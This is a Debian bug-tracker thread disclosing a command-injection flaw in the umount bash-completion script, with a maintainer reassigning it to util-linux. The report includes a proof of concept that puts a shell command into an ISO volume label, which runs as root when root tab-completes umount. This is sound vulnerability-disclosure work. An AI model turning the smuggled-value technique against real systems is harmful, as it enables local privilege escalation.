Bug#892179: code execution in bash-completion for umount

2018-03-06 Thread Salvatore Bonaccorso 
Control: reassign -1 src:util-linux 2.29.2-1
Control: tags -1 + upstream fixed-upstream

Hi Björn

Thanks for reporting the issue!

On Tue, Mar 06, 2018 at 02:44:39PM +0100, Björn Bosselmann wrote:
> Package: bash-completion
> Version: 1:2.1-4.3
> Severity: grave
> Tags: security
> 
> Hi,
> 
> when bash-completion is installed, it uses
> /usr/share/bash-completion/completions/umount from umount package to
> provide autocompletion. This script does not escape mount paths
> correctly, so it allows a local user with rights to mount filesystems to
> execute commands in the context of the umount user (probably root).
> Unprivileged users can mount filesystems with custom mountpoints using
> udisks2, FUSE or with the help of desktop environments.

The umount completion is actually provided by util-linux (since 2.28-1
where it took over from bash-completion itself). I'm thus reassigning
it to src:util-linux. Then if the issue is present as well in
bash-completion earlier than 1:2.1-4.3, then 1:2.1-4.3 removed the
completion and would not be affected in the resulting binary packages
(source still might be).

Regards,
Salvatore

Bug#892179: code execution in bash-completion for umount

2018-03-06 Thread Björn Bosselmann 
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security

Hi,

when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.

Example:

as regular user:
--
$ mkdir empty

$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)

$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.

(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
--

as different user or even root:
--
# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..

# umount  ^C

# ls -la
total 28
drwxr-xr-x  2 root root  4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r--  1 root root 0 Feb 14 10:01 foo
--

I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1

uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux

It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7

Björn Bosselmann
G DATA Software AG


-- System Information:
Debian Release: 9.3
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages bash-completion depends on:
ii  bash  4.4-5
ii  dpkg  1.18.24

bash-completion recommends no packages.

bash-completion suggests no packages.

-- no debconf information






signature.asc
Description: OpenPGP digital signature